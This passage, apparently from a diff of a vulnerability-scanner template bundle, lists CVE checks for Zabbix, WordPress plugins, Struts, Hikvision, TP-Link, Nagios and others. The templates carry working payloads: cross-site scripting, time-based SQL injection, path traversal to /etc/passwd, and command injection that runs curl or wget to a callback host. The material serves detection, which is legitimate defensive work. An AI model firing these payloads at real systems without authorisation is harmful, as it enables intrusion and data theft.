{{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh\n\ncsrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}\n"],"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name='csrfmiddlewaretoken' value='(.*)' />"],"internal":true}]}]},{"id":"CVE-2022-23134","info":{"name":"Zabbix Setup Configuration Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/setup.php","{{BaseURL}}/setup.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"},"matchers-condition":"and","matchers":[{"type":"word","words":["Database","host","port","Zabbix"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1904","info":{"name":"WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script> - Color"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29383","info":{"name":"NETGEAR ProSafe SSL VPN firmware - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n","POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"User authentication Failed\")","contains(body_2, \"User Login Failed for SSLVPN User.\")"],"condition":"and"}]}]}]}
\ No newline at end of file
+{"templates":[{"id":"CVE-2002-1131","info":{"name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search","{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search","{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21985","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"methodInput\":[{\"type\":\"ClusterComputeResource\",\"value\": null,\"serverGuid\": null}]}\n"],"matchers":[{"type":"word","part":"body","words":["{\"result\":{\"isDisconnected\":"]}]}]},{"id":"CVE-2021-43510","info":{"name":"Sourcecodester Simple Client Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3d'1'--+-&password=as\n","GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_1, \"text/html\")","status_code_1 == 200","contains(body_1, \"{\\\"status\\\":\\\"success\\\"}\")","contains(body_2, \"Welcome to Simple Client\")"],"condition":"and"}]}]},{"id":"CVE-2021-31581","info":{"name":"Akkadian Provisioning Manager - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/database/pme/phinx.yml"],"matchers-condition":"and","matchers":[{"type":"word","words":["host:","name:","pass:"],"condition":"and"},{"type":"word","negative":true,"words":["html>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43062","info":{"name":"Fortinet FortiMail 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<Svg/onload=alert(document.domain)>","FortiMail Click Protection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41653","info":{"name":"TP-Link - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi?2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\ndataBlockSize=64\ntimeout=1\nnumberOfRepetitions=4\nhost=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')\nX_TP_ConnName=ewan_ipoe_d\ndiagnosticsState=Requested\n","POST /cgi?7 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-24838","info":{"name":"WordPress AnyComment <0.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh","{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-3110","info":{"name":"PrestaShop 1.7.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2021-22873","info":{"name":"Revive Adserver <5.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"],"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-41192","info":{"name":"Redash Setup Configuration - Default Secrets Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs","{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Enter your new password:","redash"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26710","info":{"name":"Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28169","info":{"name":"Eclipse Jetty ConcatServlet - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static?/%2557EB-INF/web.xml","{{BaseURL}}/concat?/%2557EB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31805","info":{"name":"Apache Struts2 S2-062 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Length: 1095\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Disposition: form-data; name=\"id\"\n\n%{\n(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\n}\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\u2014\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-27520","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D","{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D%22"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain) x=","FUDforum"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39226","info":{"name":"Grafana Snapshot - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/snapshots/:key"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"isSnapshot\":true"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40438","info":{"name":"Apache <= 2.4.48 - Mod_Proxy SSRF","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?unix:{{repeat(\"A\", 7701)}}|http://{{interactsh-url}}"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-37416","info":{"name":"Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["></iframe><script>alert(1)</script>","adsf/js/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24970","info":{"name":"WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"All-in-One Video Gallery\")","contains(body_2, \"Hello world!\")","contains(body_2, \"Welcome to WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-24731","info":{"name":"Pie Register < 3.7.1.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-json/pie/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nuser_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"User credentials are invalid.\")"],"condition":"and"}]}]},{"id":"CVE-2021-24946","info":{"name":"WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"The event is finished\") || contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2021-46073","info":{"name":"Vehicle Service Management System 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /vehicle_service/classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /vehicle_service/classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1\n","GET /vehicle_service/admin/?page=user/list HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script> Test</td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-36260","info":{"name":"Hikvision IP camera/NVR - Remote Command Execution","severity":"critical"},"requests":[{"raw":["PUT /SDK/webLanguage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><language>$(cat /etc/passwd>webLib/x)</language>\n","GET /x HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-27316","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-30049","info":{"name":"SysAid Technologies 20.3.64 b14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36450","info":{"name":"Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1\nHost: {{Hostname}}\n","POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><h1>Test</h1>26\" class=\"loginUserNameText"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrfp_login","group":1,"regex":["csrfp_login=([a-zA-Z0-9]+);"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-42258","info":{"name":"BillQuick Web Suite SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\n__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode(\"{{VS}}\")}}&__VIEWSTATEGENERATOR={{url_encode(\"{{VSG}}\")}}&__EVENTVALIDATION={{url_encode(\"{{EV}}\")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96\n"],"cookie-reuse":true,"matchers":[{"type":"word","part":"body","words":["System.Data.SqlClient.SqlException","Incorrect syntax near","_ACCOUNTLOCKED"],"condition":"and"}],"extractors":[{"type":"xpath","name":"VS","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATE']"],"attribute":"value"},{"type":"xpath","name":"VSG","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"],"attribute":"value"},{"type":"xpath","name":"EV","internal":true,"xpath":["/html/body/form/div/input[@id='__EVENTVALIDATION']"],"attribute":"value"}]}]},{"id":"CVE-2021-1499","info":{"name":"Cisco HyperFlex HX Data Platform - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n-----------------------------253855577425106594691130420583\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../tmp/passwd9\"\nContent-Type: application/json\n\nMyPasswdNewData->/api/tomcat\n\n-----------------------------253855577425106594691130420583--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"result\":","\"filename:","/tmp/passwd9"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24237","info":{"name":"WordPress Realteo <=1.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus=alert(/{{randstr}}/);//","Nothing found"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24554","info":{"name":"WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"paytm-settings_page_wp_paytm_donation\")"],"condition":"and"}]}]},{"id":"CVE-2021-33221","info":{"name":"CommScope Ruckus IoT Controller - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service/v1/service-details"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["message","ok","data","dns","gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25298","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Connection Information","Host Check"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25864","info":{"name":"Hue Magic 3.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24387","info":{"name":"WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","/wp-content/themes/realestate"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22122","info":{"name":"FortiWeb - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error3?msg=30&data=';alert('document.domain');//","{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('document.domain');//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert('document.domain')","No policy has been chosen."],"condition":"and"}]}]},{"id":"CVE-2021-24389","info":{"name":"WordPress FoodBakery <2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29156","info":{"name":"LDAP Injection In OpenAM","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/ui/PWResetUserValidation","{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation","{{BaseURL}}/ui/PWResetUserValidation"],"matchers":[{"type":"dsl","dsl":["contains(body, \"jato.pageSession\") && status_code==200"]}]}]},{"id":"CVE-2021-41381","info":{"name":"Payara Micro Community 5.2021.6 Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["payara.security.openid.default.providerURI=","payara.security.openid.sessionScopedConfiguration=true"],"condition":"and"}]}]},{"id":"CVE-2021-41691","info":{"name":"openSIS Student Information System 8.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","POST /TransferredOutModal.php?modfunc=detail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nstudent_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5\n"],"attack":"pitchfork","payloads":{"username":["student"],"password":["student@123"]},"req-condition":true,"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<!-- SQL STATEMENT:\") && contains(body_2, \"SELECT COUNT(STUDENT_ID)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-43421","info":{"name":"Studio-42 elFinder <2.1.60 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1\nHost: {{Hostname}}\n","GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-3017","info":{"name":"Intelbras WIN 300/WRN 342 - Credentials Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword =","<title>Roteador Wireless</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["def_wirelesspassword = \"([A-Za-z0-9=]+)\";"],"part":"body"}]}]},{"id":"CVE-2021-24226","info":{"name":"AccessAlly <3.5.7 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div 